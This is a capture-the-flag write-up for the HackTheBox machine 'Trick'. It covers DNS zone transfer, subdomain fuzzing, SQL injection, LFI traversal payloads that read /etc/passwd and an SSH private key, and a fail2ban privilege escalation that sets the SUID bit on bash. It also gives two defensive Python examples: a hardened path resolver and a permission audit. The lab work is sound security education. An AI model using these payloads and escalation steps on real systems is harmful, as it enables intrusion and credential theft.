Trick - HTB - Key Points

Target's IP: 10.10.11.166

nmap -sS -p- -T4 --min-rate=10000 10.10.11.166

PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp
53/tcp open  domain
80/tcp open  http


└─# nslookup
> server 10.10.11.166
Default server: 10.10.11.166
Address: 10.10.11.166#53
> 10.10.11.166
166.11.10.10.in-addr.arpa       name = trick.htb.

We add this domain name to our /etc/hosts file and enumerate further for subdomains.
Asking the name server for a zone transfer with
dig axfr trick.htb @trick.htb
reveals a new subdomain, preprod-payroll.trick.htb.

Enumerating files and directories on this new subdomain reveals this page:
http://preprod-payroll.trick.htb/users.php
where we find an administrator account,
Enemigosss

Another page,

http://preprod-payroll.trick.htb/manage_user.php?id=1
reveals the following juicy information in a form field of the response:
value="SuperGucciRainbowCake"

Testing for potential vulnerabilities, we also find out that the id parameter of http://preprod-payroll.trick.htb/manage_user.php?id=1 is SQL injectable, but this turns out to be fairly pointless as there is not much of interest in the database.

Looking at the subdomain naming scheme, we can try to enumerate more subdomains like this:
ffuf -u http://trick.htb -H "Host: preprod-FUZZ.trick.htb" -w <wordlist>
which reveals the preprod-marketing subdomain.
On this new website we find an LFI vulnerability in the page parameter, and using the most common LFI bypass payloads we can retrieve useful information, like
/index.php?page=....//....//....//....///etc/passwd ### this reveals a user, michael
/index.php?page=....//....//....//....///home/michael/.ssh/id_rsa
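Why the ....// form of the payload works is worth seeing in code. The following is an added example, not the marketing site's source: it models the kind of include handler that deletes "../" in a single pass (which turns "....//" back into "../"), and puts a hardened resolver next to it that never rewrites the input, only accepts a bare file name and checks the canonical path stays under the document root. WEB_ROOT and PAYLOAD are constructed for the demo.

```python
import os

# Constructed values for the demo; neither comes from the box.
WEB_ROOT = "/srv/marketing/pages"
PAYLOAD = "....//....//....//....///etc/passwd"


def naive_strip(page):
    """A typical broken filter: delete every "../" in one pass.

    "....//" contains a single "../" in its middle; removing it leaves
    "../" behind, which is exactly what the ....// payload relies on.
    """
    return page.replace("../", "")


def vulnerable_resolve(web_root, page):
    """Filter-then-join handler: returns the canonical path it would include."""
    cleaned = naive_strip(page)
    return os.path.realpath(os.path.join(web_root, cleaned))


def safe_resolve(web_root, page):
    """Hardened handler: no blacklist rewriting at all.

    1. The page must be a bare file name (no directory separators, not
       "." or ".."), so traversal sequences never reach the filesystem.
    2. Defence in depth: canonicalise the candidate and require that it
       still lies under the canonical document root.
    Returns the canonical path, or None when the request is rejected.
    """
    if not page or page != os.path.basename(page) or page in (".", ".."):
        return None
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    print("filter turns", PAYLOAD, "into", naive_strip(PAYLOAD))
    print("vulnerable handler would include:", vulnerable_resolve(WEB_ROOT, PAYLOAD))
    print("hardened handler, bypass payload:", safe_resolve(WEB_ROOT, PAYLOAD))
    print("hardened handler, plain ../:", safe_resolve(WEB_ROOT, "../../etc/passwd"))
    print("hardened handler, legit page:", safe_resolve(WEB_ROOT, "about.php"))
```

The lesson for the fix is the usual one: strip-and-hope filters can be undone by an input that is shaped around the stripping, so the page parameter should be validated against what is allowed (a plain file name under one directory) rather than cleaned of what is forbidden.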


Using the SSH key we can log into the box as michael and retrieve the user flag.


Enumerating for potential privesc vectors, we find that the user is allowed to run a fail2ban command as root without a password.

Following this research blog: 

https://grumpygeekwrites.wordpress.com/2021/01/29/privilege-escalation-via-fail2ban/

we see that we can modify the action fail2ban runs when it starts in order to gain elevated privileges.

As members of the security group we can access the iptables-multiport.conf file, but we cannot simply edit it as we lack write permission on the file itself. We do have write permission on the directory, however, so we can replace the file using the following approach:

mv iptables-multiport.conf tmp
mv tmp iptables-multiport.conf ###the file has a different owner now
chmod 666 iptables-multiport.conf
nano iptables-multiport.conf ###set the restart action as chmod +s /bin/bash

Now, once we restart fail2ban, the bash binary has the SUID bit set, so we can escalate our privileges and retrieve the root flag.
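From the defender's side, the weak spot here is not the action file but the directory that holds it: write permission on a directory allows entries to be removed and new ones created regardless of who owns the existing file, so a root-owned, mode 644 config is no protection once its parent directory is group-writable. The following audit is an added example (not fail2ban's own tooling) that walks a config tree and flags files that are either directly writable by group/other or replaceable through a writable parent directory without the sticky bit. It builds a constructed miniature of the layout in a temporary directory so it runs offline; the tree contents and modes are made up for the demo. Pair such a check with a review of which groups own those directories and who holds membership, and of any sudo rule that lets a non-root user restart the service.

```python
import os
import stat
import tempfile

WRITE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH

# Constructed demo tree: the weak layout from the write-up, i.e. a
# non-writable action file inside a group-writable action.d directory.
DEMO_FILES = {
    "jail.local": 0o644,
    "action.d/iptables-multiport.conf": 0o644,
    "filter.d/sshd.conf": 0o644,
}
DEMO_DIR_MODES = {"action.d": 0o775, "filter.d": 0o755}


def build_demo_tree():
    """Create the constructed tree in a fresh temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="f2b-audit-")
    for sub in DEMO_DIR_MODES:
        os.makedirs(os.path.join(root, sub))
    for rel, mode in DEMO_FILES.items():
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("# constructed placeholder\n")
        os.chmod(path, mode)
    for sub, mode in DEMO_DIR_MODES.items():  # set dir modes last
        os.chmod(os.path.join(root, sub), mode)
    return root


def replaceable_via_directory(path):
    """True when the file is not group/world writable, but its parent
    directory is and carries no sticky bit: the entry can then be
    unlinked and a new file put in its place whoever owns the original."""
    file_mode = os.lstat(path).st_mode
    dir_mode = os.stat(os.path.dirname(path)).st_mode
    file_writable = bool(file_mode & WRITE_BY_OTHERS)
    dir_writable = bool(dir_mode & WRITE_BY_OTHERS)
    sticky = bool(dir_mode & stat.S_ISVTX)
    return dir_writable and not sticky and not file_writable


def audit_tree(root):
    """Return {relative path: reason} for every file under root that a
    non-owner could modify or swap out."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if os.lstat(full).st_mode & WRITE_BY_OTHERS:
                findings[rel] = "file is group/world writable"
            elif replaceable_via_directory(full):
                findings[rel] = "parent directory is group/world writable (file can be replaced)"
    return findings


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for rel, reason in sorted(audit_tree(demo_root).items()):
        print(f"{rel}: {reason}")
    # on a real host you would run audit_tree("/etc/fail2ban") instead
```

Mode bits alone do not say who the writable group is; on a real host, combine the result with the directory's group owner and that group's members, since a directory writable by a tightly controlled admin group is a very different risk from one writable by a group ordinary users belong to.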


Merry hacking ;)
